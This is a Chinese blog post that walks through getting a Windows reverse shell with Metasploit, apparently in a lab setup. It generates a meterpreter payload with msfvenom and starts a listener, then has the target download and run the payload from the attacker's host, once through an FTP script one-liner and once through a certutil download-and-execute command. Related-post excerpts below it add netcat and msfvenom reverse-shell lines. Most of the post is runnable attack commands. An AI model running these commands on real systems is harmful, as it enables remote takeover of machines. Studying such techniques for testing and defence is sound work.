利用msf在windows下反弹shell

于 2018-08-08 20:04:32 发布 6737 收藏 2
分类专栏: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jiajiajiang_/article/details/81514422
版权

靶机地址:10.0.3.146

攻击者地址:10.0.3.120

 

思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。

通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo)

首先利用kali生成一个shell,

命令:msfvenom -p windows/meterpreter_reverse_tcp lhost=10.0.3.120 lport=7070 -f exe -o /tmp/win.exe

 

方法一:

打开ftp服务器

利用msf的 auxiliary/server/ftp模块,只需要设置路径就好了

访问一下 访问到说明开启成功

 

成功后把这个job放入后台 ,命令是back

接下来先在kali中开启监听

命令:handler -p windows/meterpreter_reverse_tcp -H 10.0.3.120 -P 7070

现在去靶机上通过cmd命令下载win.exe并执行

cmd命令:echo open 10.0.3.120>ttt.txt&echo anonymous>>ttt.txt&echo whatever>>ttt.txt&echo binary>>ttt.txt&echo get jet.exe>>ttt.txt&echo bye>>ttt.txt&ftp -s:ttt.txt

执行后可以用dir命令看是否下载成功

之后执行jet.exe

得到反弹shell

进入sessions1 命令:sessions 1

获得meterpreter

方法二,

此方法也是要先生成一个shell,文章开头有写,不重复了。

开启http服务

命令:python -m SimpleHTTPServer 80(在需要的目录下快速开启)

访问

在msf下开启监听: handler -p windows/meterpreter_reverse_tcp -H 10.0.3.120 -P 7070

在靶机命令执行处执行

cmd.exe /c "certutil.exe -urlcache -split -f http://10.0.3.120/jet.exe &jet.exe &del jet.exe"

成功返回shell

 

一支神经病
关注
  • 2
    点赞
  • 2
    收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
使用MSF反向反弹shell
weixin_45588247的博客
07-20 3275
实验准备: 攻击(攻击者)主机: kali 2020.2 虚拟机 nat 192.168.254.132 反向反弹: 【步骤一】:msfconsole启动,结果如【图1】所示: 【命令】 msfconsole 一、msfconsole(这种没有启用数据库,搜索某些东西会很慢) 二、数据...
渗透之——Metasploit自定义FTP扫描模块
冰河的专栏
01-12 1629
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86375375 这里,我们编写的Ruby脚本ftp_version_by_binghe.rb如下: ## # Author 冰河 # Date 2019-01-12 # Description 自定义FTP发现模块,用于主动发现目标机所在C段网络的FTP服务器,并主动进行自动...
了解命令执行漏洞
最新发布
贝隆的博客
02-05 45
命令执行漏洞
Metasploit与漏洞扫描
MyDriverC
12-16 1万+
http://www.h3c.com.cn/About_H3C/Company_Publication/IP_Lh/2013/03/Home/Catalog/201307/790128_30008_0.htm 漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统进行访问或破坏。它会成为入侵者侵入系统和植入恶意软件的入口,影响系统用户的切身利益。漏洞与目标
kali2.0 metasploit安装
热门推荐
纯心缺
10-23 1万+
奇怪了,我找了几遍,我的kali竟然没有metasploit,我非常的奇怪,所以我就安装了。 1.一条代码就可以安装了 apt-get install metasploit-framework 2.安装完成后, 首先启动postgresql数据库: /etc/init.d/postgresql start;或者 service postgresql start  设置postgre...
Windows的几种常用反弹shell方法
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
msf反弹shell
weixin_34179762的博客
05-15 723
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
反弹shell---生成木马反弹shellWindows
weixin_50956890的博客
05-04 3354
Windows反弹shell的一种方式--生成木马
使用msf生成木马反弹shellwindows系统)
hmysn的博客
12-23 1811
生成木马进行植入
Metasploit终端下的辅助扫描工具 (auxiliary模块讲解)
Kevin's Blog
06-01 5683
(辅助扫描工具主要用于网络攻防前期的踩点、信息搜集) 一、操作环境 虚拟机Kali(IP:192.168.1.92) # 为方便学习开启ssh端口 # 进入ssh配置文件 》》vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES (//kali中默认是yes) 将PermitRoot...
渗透测试-window反弹shell
lza20001103的博客
05-11 945
window反弹shell
Windows反弹shell的方法
2ed
07-16 1万+
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell:...
Windows反弹shell的方式
ws1813004226的博客
05-25 2867
一、Windows反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
云服务器msf跨域反弹shell
iuyoo的博客
03-29 5367
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
DC-6靶机(wordpress命令执行、nmap提权)
m0_66299232的博客
11-15 80
1.需要修改hosts文件(和dc-2操作一样)echo '192.168.166.136 wordy'>>/etc/hosts。3.切换成了jens账户,再次执行sudo -l;我们发现 存在nmap 可以提权了。wpscan --url http://wordy/ -e u //枚举用户。4.登录页面我们发现了存在一个Activity monitor的一个插件。1.尝试ssh登录,发现成功登录;sudo-l 发现可以利用。。wordpress命令执行、nmap提权
最详细的系统漏洞扫描并对靶机进行利用攻击演练(模拟一次黑客白帽子操作)
巴胡子
08-13 4824
万万不可做坏事,仅为学习参考使用。 一、前提准备 1、所需条件: (1)kali2.0 linux 的iso文件(最好是32位,为安装nessus做好装备) 下载网址:https://www.kali.org/downloads/ 安装步骤请自行百度搜索,基础中的基础 (2)VMware虚拟机, 也可以用其他的虚拟机软件,如vmbox(免费的) 单个人感觉不如VMware好用 VMwawre下载网...
使用msf进行反弹shell+内网渗透
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一支神经病

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值